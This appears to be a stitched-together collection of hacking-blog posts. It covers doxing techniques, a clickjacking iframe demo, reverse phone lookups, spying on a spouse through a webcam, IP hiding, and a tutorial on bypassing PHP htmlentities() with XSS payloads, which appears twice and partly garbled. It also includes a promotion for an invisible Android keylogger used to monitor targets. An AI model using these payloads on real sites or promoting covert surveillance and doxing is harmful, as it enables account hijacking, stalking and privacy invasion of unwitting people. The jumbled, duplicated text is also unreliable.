In the modern world, Internet has become
a wonderful place to gain knowledge, exchange ideas, share information,
make new friends and whatnot. Even though, you can do all of this by
remaining anonymous behind your monitor, your real life identity and
personal details can still be at the risk of falling into the hands of
strangers. This is where the term “doxing” comes into play!What is Doxing?
Doxing
simply refers to the process of gathering or deducing other people’s
information such as name, age, email, address, telephone number,
photographs etc. using publicly available sources such as the Internet.
In other words, doxing is the act of using the Internet to search for
personal details about a person.
Doxing is done by initially taking a
piece of information (such as “name” or “email address”) and keeping it
as a base to find out other possible details about the person. The term
“doxing” is derived from the word “document tracing” which means to
retrieve documents about a particular person or company in order to
learn more about them.
Doxing Techniques:
Today, Internet has grown to such a size
that it contains almost any information that you’ve ever imagined! All
you’ve to do is use the right techniques to search for what you want.
Here is a list of doxing techniques that are most commonly used by
Internet geeks and ethical hackers:
Using Google:
Google is undoubtedly a powerful tool
that plays a key role in doxing. Since Google indexes almost anything on
the Internet (sometimes even the private information), it is possible
to dox for details such as email ID, address, phone numbers and
photographs of a person or company. Once you obtain the search results
for your query, carefully examine the description part which in most
cases contain the piece of information that you are looking for.
Social Networking Websites:
As most Internet users are found to be
active on social media, social networking sites such as Facebook and
LinkedIn provide a virtual goldmine of information necessary to perform
doxing. As most users are unaware of online security issues, they have
weak privacy settings on their profile. This makes it easy for the
attackers to gain access to personal information such as photographs,
real names, location, job, partner’s name etc.
Reverse Cell Phone LookUp:
A “Reverse Cell Phone Lookup”
is simply a process of finding someone’s personal details such as name,
age, address and related information by using their cell phone number
and vice versa. There are many online services out there such as cell phone registry that provide access to the personal details about a given person based on his/her phone, name and email ID.
Whois Searches:
If a person or company has a website (or
domain name) associated with them, you can easily perform a “whois
search” for their website to obtain personal details such as full name,
address, email and phone number. Just visit whois.domaintools.com
and enter the domain name for which you want to perform a whois search.
It will show up all the details associated with the domain name.
Why Would Anyone Want to Perform Doxing?
Most people perform doxing out of
general curiosity about a person or company. However, there are some
wicked minds out there who do this for the purpose of blackmailing or
taking revenge by exposing the information that they have gathered about
the person.
What are the Consequences of Doxing?
It can be slightly irritating and
embarrassing when private data fall in the hands of people who are not
intended to have access to such information. However, things can go even
worse if the doxed information such as a person’s social activities,
medical history, sexual preference and other vital bits of information
is made public. This can have a serious threat to health, livelihood or
relationship of the victim.
Steps to Protect Yourself from Doxing:
The following are some of the most commonly targeted pieces of information that can be easily obtained through doxing:
- Full name
- Age, gender and date of birth
- Location and place of birth
- Email addresses and username
- Phone number
- Social networking profiles, websites and blogs
So, it is always a good practice to keep
the above bits of information hidden. Even though it is not possible to
do this in all cases, you can still take care to protect as much
information as you can from going public. You can consider the following
additional tips for further protection:
- Do not upload personal photographs on web albums such as “Picasa”. Even if you do, make sure that your album is hidden from public and search engines.
- If you do not intend to show up your profile on search engines, it is a wise choice to make all the Internet profiles private.
- Maximize the privacy settings of your social network profiles. Make sure that your individual albums and photographs have their privacy settings configured.
- Do not use the same email address for all you accounts. Instead, create separate email IDs for individual activities such as gaming, forum participation, banking accounts etc.
Is Doxing a Crime?
Doxing is definitely not a crime when
used within the ethical standards and no harm is being caused to anyone.
However, if doxing is done to cause intentional damage such as
harassment, blackmailing or taking revenge it might well be considered
an offence.
Clickjacking attack allows to perform an action on victim website, Mostly Facebook and Twitter accounts are targetable.When an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both. It may be similar to CSRF Cross Site Request Forgeries Attack.
Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.
Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they
are typing in the password to their email or bank account, but are instead typing into
an invisible frame controlled by the attacker.
At present this attack mostly use on social network websites like Facebook and twitter, Because this attack is used by convinced victim for click on the link and Social Network website might be very useful for attack on victim.
Code:
<style>
iframe { /* iframe from facebook.com */
width:300px;
height:100px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>
<div>Click on the link to get more followers:</div>
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>
<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>
<div>You'll be get 10000 followers..!!</div>
Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!
Download
ClickJacking Tool
For Defence:
Clickjacking Protection
For more information:
OWASP
A Reverse Cell Phone Lookup is
simply a process of finding someone’s personal details such as name,
age, address and related information by using their cell phone number.
At times, it becomes necessary for us to start investigating on someone
to know their personal details.
The reason for this can be many – Some
people may go for a cell phone lookup in order to locate their old
friends, some to investigate the prank calls or to trace a suspicious
number.
Reverse Cell Phone Lookup Services:
There exists a lot of websites on the Internet that offer reverse cell phone
search, some claim to be free while others ask you a small fee for the
subscription. There also exists a few directories that provide access to
both landline and cell phone numbers thereby providing an all-in-one
lookup service.
Since most people wish to access this
information for free, they go in search of those websites which provide
the reverse cell phone lookup service for free. Most scam websites take
up this tendency of people as an added advantage and try to attract more
and more visitors by promising them to provide the search service at a
free of cost. In reality, the visitors of these websites may pick up
malware programs like viruses and trojans.
So, you should be very careful not
to visit any of such websites unless you are 100% confident about their
legitimacy. Hence, in order to do a reverse cell phone lookup, you need
to find a trusted website/directory service that provide information
which is accurate and authentic.
There are a number of top quality directories used by
various private detectives, journalists and those who are in need to spy
on their cheating spouse or children. These companies invest a lot of
time and financial resources in gathering mobile phone and landline
numbers by using both private and public sources, as well as major cell
phone carrier restricted databases.
Thus, by using this service it becomes
just a cakewalk for anyone to find the details associated with any phone
number whether it be a cell phone or a landline. The entire process of
finding someone by cellphone number is very straightforward – all
you need to do is just enter the phone number that you want to trace
down and hit the “Search” button. You will be able to instantly view the
information such as the phone owner’s name, age, mobile provider,
billing address, previous addresses and more.
You can now easily monitor your room,
office or workplace for activities going on during your absence without
having to invest on expensive hidden cameras. If you’ve ever wondered to
find a way to turn your PC webcam into a spy camera, here is a simple
and effective solution. This can be really handy to monitor your
children and pets in home or even catch a cheating spouse red handed!
For this, all you need is a computer with an Internet connection and a
webcam attached to it.
If your computer meets the above simple requirements, then you are all set to go. The site called UGOlog.com
provides a free solution to simply transform your webcam into a
powerful spy camera in just a few steps. You can sign-up for a free
account and start using the service immediately.
Since UGOlog service runs as a web
application from within the browser, there is no need to install any
additional software on your computer. That means, when your spouse or
children look through the installed programs, they don’t find anything
that arouses suspicion.
The following are some of the advantages of using UGOlog service over other software programs or a conventional spy camera:
- Firstly, the service comes for free, so that you don’t need to buy anything to start with.
- Unlike software programs such as “Webcam Monitor” which is complicated to configure and lacks stealth operation, UGOlog needs no installation and is simple to setup.
- UGOlog comes with powerful features such as as motion detection, email alerts, and interval snapshots.
- You have the option to view the camera remotely from anywhere just by logging into your UGOlog account.
Once you’ve created your account, you can take up a quick tour and browse through the configuration guide
to begin using the service. The free version of UGOlog limits the
service for only 1 webcam and 50 MB of storage space. If you wish to
setup more than one camera and need additional space for recording more
videos, you can easily switch for paid plans as per your convenience.
As the use of Internet is increasing, the
chances of your computer getting hacked are also increasing
dramatically. There is plenty of file sharing and web surfing that is
being done, which makes your computer vulnerable for attack. But this
article will help you in deciding what steps to take if your computer
gets hacked.How to Find if Your Computer is Hacked?
It is important to know when your computer has been actually hacked and when it is just behaving weird:
- Sometimes it’s just simple and the hacker may leave some note or warning to prove that your computer is actually hacked.
- You are not able to access your various mails and social media accounts or at worst you are not able to access your computer.
Steps to Take if Your Computer Gets Hacked:
1. Check the Impact of Damage
After using your computer for some time
you would know what type of infection you are facing whether it’s
malware, virus, trojan, keylogger (spyware) or anything else. In case a
keylogger application is installed, you can use a good antispyware
program to remove the infection. However, formatting the hard drive is a
better option if the infection is severe. You should try to back-up all
the important and confidential files that you may have in your computer
before formatting.
2. Damage Control
You should run antivirus programs to determine the extent of damage. Users of Windows OS can run “Malware bytes” which can be found freely and recognises various harmful applications which antivirus cannot. Sophos Mac antivirus is a free application which can be used by Mac users.
3. Removal
After running several scans you will know
what is the extent of damage you are facing. After making the list of
viruses and malware that have infected your computer, next thing you
need to find is what the impact of damage is. For that you must check
the details about those viruses and malware programs to know how they
rank in terms of damages they can have in your computer. You must carry
out the searches from a neutral device which is not hacked and search
for removal tools for those malware programs which have infected your
computer. Unfortunately, if after several tries you are not able to
clean your computer then the only option left is to re-install your
operating system.
4. Offline Hacking
This is true that Internet is the most
common way to hack a computer, but it is possible that anybody can hack
your system using USB devices. The process of removal of the infection
is the same in this case as well. The best precaution you can take to
avoid such situations is to password protect your computer OS and BIOS.
This makes it difficult for anyone to gain access to your computer.
Conclusion:
The best thing that you can do is to
protect your computer by using fully updated antivirus and a good
firewall. It is also wise to have a protection tool for windows
registry. To protect your files, you can use encryption tools so as to
encrypt the data on your hard disk. As there is no 100% foolproof way to
prevent hacking it is always better to take precautionary measures.
Every computer on the Internet has a
unique IP address allotted to it which makes it possible to trace it
back to its exact location. Even though the concept of Internet Protocol
address has been designed for its transparency and traceability, in
some cases this questions the privacy of the Internet user where one
would not like to reveal his/her identity to the outside world.
Well, if you are one such person who is in search of ways to hide your IP address online,
then you are at the right place. In this post, I will discuss some of
the easy and popular ways to mask your IP address so that your identity
and privacy is kept safe.
Why Hide IP Address?
The following are some of the common reasons why people want to mask their IP address online:
- By hiding the IP address, people can browse websites anonymously without leaving the trace of their identity.
- To access websites and portals that are not available to the IP addresse’s their Geo location.
- Stay safe from intruders and hackers by showing a fake IP to the world.
- Hiding IP means hiding geographical location.
- Hiding IP prevents leaving a digital footprint of their online activity.
How to Hide Your IP?
Some of the most common ways to hide IP and safeguard your online identity are discussed below:
1. Using a VPN Proxy – The Safe and Secure Way to Hide Your IP
Using a trusted VPN service is the best
way to hide your IP during your online activities. Here is a list of
most popular and highly reliable VPN services that you can go for:
- VyprVPN: VyprVPN offers the world’s fastest VPN services to its clients and supports wide range of operating systems including Windows, Mac, Android and iOS.
- Hide My Ass VPN: Hide My Ass is one of the most popular and trusted VPN service that allows people to easily conceal their IP address and protect their online privacy.
The following are some of the advantages of using a VPN service over any other method of concealing your IP address:
- In addition to hiding your IP, a VPN service encrypts all your web traffic to keep you safe from hackers and intruders.
- Unlike other IP hiding methods (discussed in the latter part of this article) which affects your speed of browsing, a VPN service keeps your Internet speed fast without affecting its performance.
- You have a long list of countries and states to select from as your place of origin. For example, if you are originally from United Kingdom, you may choose an IP address that belong to United States so that the websites that you visit will see you as from US and not UK.
- By selecting an IP address of your choice, you can easily bypass location blocks and even access restricted websites that are not available for your country.
2. Website Based Proxy Servers
This is another popular way to quickly
mask IP address on the Internet. Since it is a web based service, users
need not have to install any piece of software program on their
computer. The following are some of the popular websites that offer free
services to hide IP address:
The downside of using these free services
to hide your IP address is that most of them become overloaded and are
too slow to use. In addition, some of them will not offer a secured
connection (SSL) and you will often be presented with annoying ads and
pop-ups during the course of your browsing.
3. Browser Configured Proxy Servers
There are hundreds of freely available
open proxies that can be found on the Internet. You can obtain the IP
address of one of those freely available proxy servers and configure
your browser to start hiding your original IP address. However, as they
are openly available to public, most of them are either dead or perform
too slow under normal conditions.
Which Service to Choose?
If you only want to hide your IP address for
a specific amount of time and are not concerned with the performance,
go for the free web based services. On the other hand, if you have the
necessity to hide your IP on a regular basis, need high security and
performance, go for paid VPN services like Hide My Ass or VyprVPN.
For very many people, security is one of
the most important issues when it gets to sending their files into the
cloud. They worry that their files will be seen or even compromised by
other persons because that is what took place in the past. The user
accounts used to be hacked, cloud storage systems failed and personal
files and data were exposed. Therefore, how can you successfully prevent
that from ever happening even when the account gets hacked or something
happens to your provider of cloud storage?The answer to that question is encryption
Encryption can be defined as the process
of making one’s files unreadable with a pass phrase or an encryption key
so that even when another person gains access to the files, it does not
matter because the intruder will only be able to see gibberish. To be
able to see very properly what is in the file, one must have a key.
This article contains the two different
ways through which one can make his or her files secure and be able to
safely use cloud storage without any worries.
Available options
Essentially, when it gets to encrypting files in the cloud, one has two options from which he or she can choose, that is:
- He or she may choose the cloud storage with a built in encryption.
- Make use of a service which encrypts folders and/or files for him or her.
Cloud storage service with built-in encryption
Regardless of your choice, both of the
ways to encrypt data to store in cloud have advantages and
disadvantages. If you decide to go with the dedicated secure cloud
service, you might be required to change the entire setup of
transferring files to that specific service, familiarize yourself with
the way it works and probably give up on a certain third party support,
mainly if you come from the most well-liked cloud storage and syncing
service, that is “Dropbox”. Alternatively, you have got everything under
one hood and you do not have to worry any more about file security and
integrity.
Service for encryption only
If you are using a service which is
dedicated to encrypting your files, you will be having more control over
which files you would like to encrypt and where you would like them to
be stored. For instance, you may choose Dropbox, if at all you like the
service; and not give up after encrypting the files properly.
Conversely, your files might take longer to be properly synced in case
you are getting them encrypted using third party apps.
Conclusion
Either way, it is believed to be very
necessary to protect one’s files using the most proper encryption, most
especially if he or she is using Dropbox for managing his or her
critical files such as contracts, password databases, or any other
personal or business files which may be considered to be very important.
Depending on an individual, some would
like to install another software on their computers just for the purpose
of encryption, while others not. Those who don’t may take advantage of
the idea of signing up for a dedicated cloud solution which has built-in
local encryption for all the files. Some of such solutions available
include SpiderOak, Wuala and Cubby. If online viruses are among the
things troubling you, you may also consider making use of the Norton Contact Phone number so as to inquire about how you can be helped.
The Security researcher Paulos Yibelo shared how he bypassing htmlentities().
Well I don’t know how to break it down for you, you just can’t (if the function is used properly and exactly where it should). But it’s more probable that most developers don’t use it the right way, since it’s like a norm for some developers to not use built-in functions properly :P. So I will talk about some of the cases I came up while pentesting. htmlentities() and htmlspecailchars() are functions mainly developed to filter out cross site scripting attacks.
But I can promise you that you can build a better function if your user
input is massive since that’s when most exploitation scenarios begin.
How? Well, the functions html entity the characters < , > “ and ‘.
So without those there seems there is no XSS. Or isn’t really? Well, I
can think of one. Something like javascript:alert(1); will be executed since none of the characters in it are filtered to be
html entityed… but there is a limitation to this. Without using “> or
any similar technique we will not be able to break out of the attribute
we are inside.
Also the value attribute in html is not vulnerable since it only accepts strings and well we need scripts that can execute… something like href, onclick would do… but who would put such a foolish mistake right? Well you wouldn’t believe if I told you even big companies like Facebook does.
Have a code like?
print "<a href='".htmlentities($url)."'>Click Here</a>";
“javascript:alert(1);” will bypass it because it doesn’t contain the characters that will be filtered. But notice a limitation here? Our code will only execute if user clicks the Click Here button. So that’s a huge limitation. Or is it? The html code will become something like
But we need to break out of the href tag and execute a more malicious javascript. But how? If we try to break out of it using ‘> it won’t work since both those characters are filtered out… and the code will become something like
Right? Well not exactly. Htmlentities comes with single quote ( ‘ ) not filtered by default and you have to specify a special switch called ENT_QUOTES to declare that. So the real output when values like “javascript:alert(1);’>” is given
A hope! We broke out of the attribute so giving values like
will output html source like
<a href='javascript:alert(1);' onfocus=alert(1); autofocus>Click Here</a>
So wow… our final payload to bypass the filter would look something like
Would successfully bypass the function htmlentities and prints out the source of
Successful explotation of the function htmlentities. so why not use the switch to enable the single quote (‘) and make our code secured. something like
print "<a href='".htmlentities($url, ENT_QUOTES)."'>Click Here</a>";
Well now, we may can’t break out of the cage we are inside but still can execute JavaScript in the attribute we are inside. However, the value html attribute is off limits. we cannot execute JavaScript inside it. But when you find code like:
print "<input type='text' value=".htmlentities("$value").">";
even when using ENT_QUOTES, this is when value attribute becomes vulnerable.
will successfully bypass the value parameter and make html code like
So not using quotes got us vulnerable, we will just use quotes then. Well I recommend not using single quotes… that’s when your code nearly becomes vulnerable when you forgot to use the switch ENT_QUOTES, which you probably will.
But this isn’t just it… attackers can still attack your application using a different character set called UTF-7 even when you are using proper usage of htmlentities, so unless you protect your code by setting your charset to UTF-8 or any other charset other that 7, you are still vulnerable to XSS.
Well I don’t know how to break it down for you, you just can’t (if the function is used properly and exactly where it should). But it’s more probable that most developers don’t use it the right way, since it’s like a norm for some developers to not use built-in functions properly :P. So I will talk about some of the cases I came up while pentesting. htmlentities() and htmlspecailchars() are functions mainly developed to filter out cross site scripting attacks.
But I can promise you that you can build a better function if your user
input is massive since that’s when most exploitation scenarios begin.
How? Well, the functions html entity the characters < , > “ and ‘.
So without those there seems there is no XSS. Or isn’t really? Well, I
can think of one. Something like javascript:alert(1); will be executed since none of the characters in it are filtered to be
html entityed… but there is a limitation to this. Without using “> or
any similar technique we will not be able to break out of the attribute
we are inside.Also the value attribute in html is not vulnerable since it only accepts strings and well we need scripts that can execute… something like href, onclick would do… but who would put such a foolish mistake right? Well you wouldn’t believe if I told you even big companies like Facebook does.
Have a code like?
print '<img src="'.htmlentities("$url").”';
or evenprint "<a href='".htmlentities($url)."'>Click Here</a>";
“javascript:alert(1);” will bypass it because it doesn’t contain the characters that will be filtered. But notice a limitation here? Our code will only execute if user clicks the Click Here button. So that’s a huge limitation. Or is it? The html code will become something like
<a href='javascript:alert(1);'>Click Here</a>
But we need to break out of the href tag and execute a more malicious javascript. But how? If we try to break out of it using ‘> it won’t work since both those characters are filtered out… and the code will become something like
<a href='javascript:alert(1);">'>Click Here</a>
Right? Well not exactly. Htmlentities comes with single quote ( ‘ ) not filtered by default and you have to specify a special switch called ENT_QUOTES to declare that. So the real output when values like “javascript:alert(1);’>” is given
<a href='javascript:alert(1);'>'>Click Here</a>
A hope! We broke out of the attribute so giving values like
javascript:alert(1);’ onfocus=alert(1); autofocus
will output html source like
<a href='javascript:alert(1);' onfocus=alert(1); autofocus>Click Here</a>
So wow… our final payload to bypass the filter would look something like
paulos’ onfocus=alert(0); autofocus
<a href='paulos' onfocus=alert(0) autofocus>Click Here</a>
Successful explotation of the function htmlentities. so why not use the switch to enable the single quote (‘) and make our code secured. something like
print "<a href='".htmlentities($url, ENT_QUOTES)."'>Click Here</a>";
Well now, we may can’t break out of the cage we are inside but still can execute JavaScript in the attribute we are inside. However, the value html attribute is off limits. we cannot execute JavaScript inside it. But when you find code like:
print "<input type='text' value=".htmlentities("$value").">";
even when using ENT_QUOTES, this is when value attribute becomes vulnerable.
paulos onmouseover=alert(1);
will successfully bypass the value parameter and make html code like
<input type='text' value=paulos onmouseover=alert(1);>
Cool.So not using quotes got us vulnerable, we will just use quotes then. Well I recommend not using single quotes… that’s when your code nearly becomes vulnerable when you forgot to use the switch ENT_QUOTES, which you probably will.
But this isn’t just it… attackers can still attack your application using a different character set called UTF-7 even when you are using proper usage of htmlentities, so unless you protect your code by setting your charset to UTF-8 or any other charset other that 7, you are still vulnerable to XSS.
Disclaimer! This Software is designed only to be used to monitor your child or employee. We do not condone the use of this software for illegal or unethical purposes.
The PC Monitoring Software (keylogger) which we are talking about is WinSpy Software Pro which now supports Android smartphone monitoring.
WinSpy Software Pro is a Complete Stealth Monitoring Software for
Windows that can monitor your Local or Remote PC and now any Android
device (cell Phone or Tablet); In short Win Spy can capture anything the
user sees or types on the keyboard.
Unlike other Mobile Spy softwares that notify the users that they are being monitored by device notifications and a tamper-proof icon, the Winspy Android module
is completely invisible on the target phone; i.e It could Stalk Android
Smartphone without detection when it is installed on a target’s phone.
With the Android module you can:
- View complete SMS text messages.
- Get GPS locations as often as you wish.
- Log call details and websites visited.
- View memos, contacts and email.
- FTP Option: Get all the data to your FTP account.
This New WinSpy Android module does not rely on the phone’s call or message database to log activities. So even if your target tries to delete their usage histories, the information will still be retained and inserted to your account.
With this Software you can easily monitor your child or Employee for potential misuse of the Smartphone and there is no limitations to the number of target phones you can monitor or install on.
We have seen Windows XP being Installed on Android
device But this is nothing like you have seen before. First time someone
has ported desktop Windows OS on iPhone and has managed to get it
working. i.e Windows 98 (pre-millennium Windows version) on iPhone 6
Plus.
A Chinese hacker with the handle xyqo58775 on popular Chinese tech forum posted about how he was able to successfully install Windows 98
on an iPhone 6 Plus and even provides tutorial on the same. The install
seems to be the real thing and not the script-based emulation.
The most interesting thing is that he managed to carry out this hack
without jail-breaking his device. He reportedly used a legal version of iDOS, which probably does a fine job at emulating. iDos is an emulator that allows you to play dos games on your iPhone or iPad.
The hacker claims that he has only used the existing resources &
tools available and he is “not a big God”. He also said that he will get
Windows XP running on iPhone 6 Plus whenever he gets time. Meanwhile if
you know Chinese you can refer his tutorial on Installing Windows 98 on iPhone 6 Plus here [Google Translate].
